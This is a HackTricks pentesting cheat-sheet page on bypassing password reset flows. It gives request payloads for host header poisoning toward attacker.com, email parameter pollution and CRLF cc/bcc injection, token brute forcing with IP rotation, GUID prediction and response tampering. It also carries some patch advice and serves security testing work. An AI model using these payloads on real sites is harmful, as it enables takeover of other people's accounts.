hacktricks/pentesting-web/reset-password.md

344 lines
12 KiB
Markdown
Raw Normal View History

2022-10-26 09:16:32 +00:00
# Reset/Forgotten Password Bypass
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2022-10-26 09:16:32 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2023-04-25 18:35:28 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2023-03-05 19:54:13 +00:00
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>
2023-03-05 19:54:13 +00:00
<figure><img src="../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
2022-10-27 23:22:18 +00:00
2023-03-05 19:54:13 +00:00
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
2023-02-27 09:28:45 +00:00
🐞 Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
2022-10-27 23:22:18 +00:00
2021-04-07 10:04:56 +00:00
The following techniques recompilation was taken from [https://anugrahsr.github.io/posts/10-Password-reset-flaws/](https://anugrahsr.github.io/posts/10-Password-reset-flaws/)
2022-10-26 09:16:32 +00:00
## Password Reset Token Leak Via Referrer
2022-10-26 09:16:32 +00:00
The **HTTP referer** is an optional HTTP header field that identifies the address of the webpage which is linked to the resource being requested. The Referer request header contains the address of the previous web page from which a link to the currently requested page was followed
2021-04-07 13:16:44 +00:00
![](https://www.optimizesmart.com/wp-content/uploads/2020/01/1-1-2.jpg)
2022-10-26 09:16:32 +00:00
### Exploitation
2021-04-07 10:04:56 +00:00
* Request password reset to your email address
* Click on the password reset link
* Dont change password
2022-10-26 09:16:32 +00:00
* Click any 3rd party websites(eg: Facebook, twitter)
2021-04-07 10:04:56 +00:00
* Intercept the request in burpsuite proxy
* Check if the referer header is leaking password reset token.
2022-10-26 09:16:32 +00:00
### Impact
2020-10-07 09:34:02 +00:00
2022-10-26 09:16:32 +00:00
It allows the person who has control of particular site to change the users password (CSRF attack), because this person knows reset password token of the user.
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
### Reference:
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/342693
* https://hackerone.com/reports/272379
* https://hackerone.com/reports/737042
* https://medium.com/@rubiojhayz1234/toyotas-password-reset-token-and-email-address-leak-via-referer-header-b0ede6507c6a
* https://medium.com/@shahjerry33/password-reset-token-leak-via-referrer-2e622500c2c1
2022-10-26 09:16:32 +00:00
## Password Reset Poisoning
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
If you find a host header attack and its out of scope, try to find the password reset button!
2021-04-07 10:04:56 +00:00
![](https://portswigger.net/web-security/images/password-reset-poisoning.svg)
2022-10-26 09:16:32 +00:00
### Exploitation
2021-04-07 10:04:56 +00:00
* Intercept the password reset request in Burpsuite
2022-10-26 09:16:32 +00:00
* Add following header or edit header in burpsuite(try one by one)
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
```
2021-04-07 10:04:56 +00:00
Host: attacker.com
```
2022-10-26 09:16:32 +00:00
```
2021-04-07 10:04:56 +00:00
Host: target.com
X-Forwarded-Host: attacker.com
```
2022-10-26 09:16:32 +00:00
```
2021-04-07 10:04:56 +00:00
Host: target.com
Host: attacker.com
```
* Check if the link to change the password inside the email is pointing to attacker.com
2022-10-26 09:16:32 +00:00
### Patch
2021-04-07 10:04:56 +00:00
Use `$_SERVER['SERVER_NAME']` rather than `$_SERVER['HTTP_HOST']`
```php
$resetPasswordURL = "https://{$_SERVER['HTTP_HOST']}/reset-password.php?token=12345678-1234-1234-1234-12345678901";
```
2022-10-26 09:16:32 +00:00
### Impact
2021-04-07 10:04:56 +00:00
The victim will receive the malicious link in their email, and, when clicked, will leak the users password reset link / token to the attacker, leading to full account takeover.
2022-10-26 09:16:32 +00:00
### Reference:
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/226659
* https://hackerone.com/reports/167631
* https://www.acunetix.com/blog/articles/password-reset-poisoning/
* https://pethuraj.com/blog/how-i-earned-800-for-host-header-injection-vulnerability/
* https://medium.com/@swapmaurya20/password-reset-poisoning-leading-to-account-takeover-f178f5f1de87
2022-10-26 09:16:32 +00:00
## Password Reset With Manipualating Email Parameter
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
### Exploitation
2021-04-07 10:04:56 +00:00
* Add attacker email as second parameter using &
```php
POST /resetPassword
[...]
email=victim@email.com&email=attacker@email.com
```
* Add attacker email as second parameter using %20
```php
POST /resetPassword
[...]
email=victim@email.com%20email=attacker@email.com
```
2022-10-26 09:16:32 +00:00
* Add attacker email as second parameter using |
2021-04-07 10:04:56 +00:00
```php
POST /resetPassword
[...]
email=victim@email.com|email=attacker@email.com
```
* Add attacker email as second parameter using cc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dcc:attacker@mail.tld"
```
* Add attacker email as second parameter using bcc
```php
POST /resetPassword
[...]
email="victim@mail.tld%0a%0dbcc:attacker@mail.tld"
```
* Add attacker email as second parameter using ,
```php
POST /resetPassword
[...]
email="victim@mail.tld",email="attacker@mail.tld"
```
* Add attacker email as second parameter in json array
```php
POST /resetPassword
[...]
{"email":["victim@mail.tld","atracker@mail.tld"]}
```
2022-10-26 09:16:32 +00:00
### Reference
2021-04-07 10:04:56 +00:00
* https://medium.com/@0xankush/readme-com-account-takeover-bugbounty-fulldisclosure-a36ddbe915be
* https://ninadmathpati.com/2019/08/17/how-i-was-able-to-earn-1000-with-just-10-minutes-of-bug-bounty/
* https://twitter.com/HusseiN98D/status/1254888748216655872
2022-10-26 09:16:32 +00:00
## Changing Email And Password of any User through API Parameters
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
### Exploitation
2021-04-07 10:04:56 +00:00
* Attacker have to login with their account and Go to the Change password function
* Start the Burp Suite and Intercept the request
* After intercepting the request sent it to repeater and modify parameters Email and Password
```php
POST /api/changepass
[...]
("form": {"email":"victim@email.tld","password":"12345678"})
```
2022-10-26 09:16:32 +00:00
### Reference
2021-04-07 10:04:56 +00:00
* https://medium.com/@adeshkolte/full-account-takeover-changing-email-and-password-of-any-user-through-api-parameters-3d527ab27240
2022-10-26 09:16:32 +00:00
### No Rate Limiting: Email Bombing <a href="#5-no-rate-limiting-email-bombing" id="5-no-rate-limiting-email-bombing"></a>
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
### Exploitation
2021-04-07 10:04:56 +00:00
* Start the Burp Suite and Intercept the password reset request
* Send to intruder
* Use null payload
2022-10-26 09:16:32 +00:00
### Reference
2021-04-07 10:04:56 +00:00
* https://hackerone.com/reports/280534
* https://hackerone.com/reports/794395
2022-10-26 09:16:32 +00:00
## Find out How Password Reset Token is Generated
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
Figure out the pattern of password reset token
2021-04-07 10:04:56 +00:00
2022-10-26 09:16:32 +00:00
![](https://encrypted-tbn0.gstatic.com/images?q=tbn%3AANd9GcSvCcLcUTksGbpygrJB4III5BTBYEzYQfKJyg\&usqp=CAU)
2021-04-07 10:04:56 +00:00
If it
* Generated based Timestamp
* Generated based on the UserID
* Generated based on email of User
* Generated based on Firstname and Lastname
* Generated based on Date of Birth
* Generated based on Cryptography
Use Burp Sequencer to find the randomness or predictability of tokens.
2022-10-26 09:16:32 +00:00
## Guessable GUID
There are different types of GUIDs:
* **Version 0:** Only seen in the nil GUID ("00000000-0000-0000-0000-000000000000").
* **Version 1:** The GUID is generated in a predictable manner based on:
* The current time
* A randomly generated "clock sequence" which remains constant between GUIDs during the uptime of the generating system
* A "node ID", which is generated based on the system's MAC address if it is available
* **Version 3:** The GUID is generated using an MD5 hash of a provided name and namespace.
* **Version 4:** The GUID is randomly generated.
* **Version 5:** The GUID is generated using a SHA1 hash of a provided name and namespace.
2023-03-05 19:54:13 +00:00
It's possible to take a look to a GUID and find out its version, there is a small tool for that: [**guidtool**](https://github.com/intruder-io/guidtool)\*\*\*\*
2022-10-26 09:16:32 +00:00
```http
guidtool -i 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c
UUID version: 1
UUID time: 2021-11-17 17:52:18.141000
UUID timestamp: 138564643381410000
UUID node: 17547390002044
UUID MAC address: 0f:f5:91:f2:a3:7c
UUID clock sequence: 3426
```
If the used version to generate a reset password GUID is the version 1, it's possible to bruteforce GUIDS:
```http
guidtool 1b2d78d0-47cf-11ec-8d62-0ff591f2a37c -t '2021-11-17 18:03:17' -p 10000
a34aca00-47d0-11ec-8d62-0ff591f2a37c
a34af110-47d0-11ec-8d62-0ff591f2a37c
```
### References
* [https://www.intruder.io/research/in-guid-we-trust](https://www.intruder.io/research/in-guid-we-trust)
## Response manipulation: Replace Bad Response With Good One
2021-04-07 10:04:56 +00:00
Look for Request and Response like these
```php
HTTP/1.1 401 Unauthorized
(“message”:”unsuccessful”,”statusCode:403,”errorDescription”:”Unsuccessful”)
```
Change Response
```php
HTTP/1.1 200 OK
(“message”:”success”,”statusCode:200,”errorDescription”:”Success”)
```
2022-10-26 09:16:32 +00:00
### Reference
2021-04-07 10:04:56 +00:00
* https://medium.com/@innocenthacker/how-i-found-the-most-critical-bug-in-live-bug-bounty-event-7a88b3aa97b3
2022-10-26 09:16:32 +00:00
### Using Expired Token <a href="#8-using-expired-token" id="8-using-expired-token"></a>
2021-04-07 10:04:56 +00:00
* Check if the expired token can be reused
2022-10-26 09:16:32 +00:00
### Brute Force Password Rest token <a href="#9-brute-force-password-rest-token" id="9-brute-force-password-rest-token"></a>
2021-04-07 10:04:56 +00:00
Try to bruteforce the reset token using Burpsuite
```php
POST /resetPassword
[...]
email=victim@email.com&code=$BRUTE$
```
* Use IP-Rotator on burpsuite to bypass IP based ratelimit.
2022-10-26 09:16:32 +00:00
### Reference
2021-04-07 10:04:56 +00:00
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
2022-10-26 09:16:32 +00:00
### Try Using Your Token <a href="#10-try-using-your-token" id="10-try-using-your-token"></a>
2021-04-07 10:04:56 +00:00
* Try adding your password reset token with victims Account
```php
POST /resetPassword
[...]
email=victim@email.com&code=$YOUR_TOKEN$
```
2022-10-26 09:16:32 +00:00
### Reference
2021-04-07 10:04:56 +00:00
* https://twitter.com/HusseiN98D/status/1254888748216655872/photo/1
2021-03-22 09:20:53 +00:00
2022-10-26 09:16:32 +00:00
## Session I**nvalidation** in Logout/Password Reset
2022-10-26 09:16:32 +00:00
When a user **logs out or reset his password**, the current session should be invalidated.\
Therefore, **grab the cookies** while the user is logged in, **log out**, and **check** if the **cookies** are still **valid**.\
Repeat the process **changing the password** instead of logging out.
2022-10-26 09:16:32 +00:00
## Reset Token expiration Time
The **reset tokens must have an expiration time**, after it the token shouldn't be valid to change the password of a user.
2022-10-26 09:16:32 +00:00
## Extra Checks
* Use username@burp\_collab.net and analyze the callback
* User carbon copy email=victim@mail.com%0a%0dcc:hacker@mail.com
2022-10-26 09:16:32 +00:00
* Long password (>200) leads to DoS
* Append second email param and value
2023-03-05 19:54:13 +00:00
<figure><img src="../.gitbook/assets/image (7).png" alt=""><figcaption></figcaption></figure>
2022-10-27 23:22:18 +00:00
2023-03-05 19:54:13 +00:00
[**Follow HackenProof**](https://bit.ly/3xrrDrL) **to learn more about web3 bugs**
2022-10-27 23:22:18 +00:00
2023-02-27 09:28:45 +00:00
🐞 Read web3 bug tutorials
🔔 Get notified about new bug bounties
💬 Participate in community discussions
2022-10-27 23:22:18 +00:00
2022-04-28 16:01:33 +00:00
<details>
2023-04-25 18:35:28 +00:00
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
2022-04-28 16:01:33 +00:00
2022-10-26 09:16:32 +00:00
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
2023-04-25 18:35:28 +00:00
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
2023-03-05 19:54:13 +00:00
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
2022-04-28 16:01:33 +00:00
</details>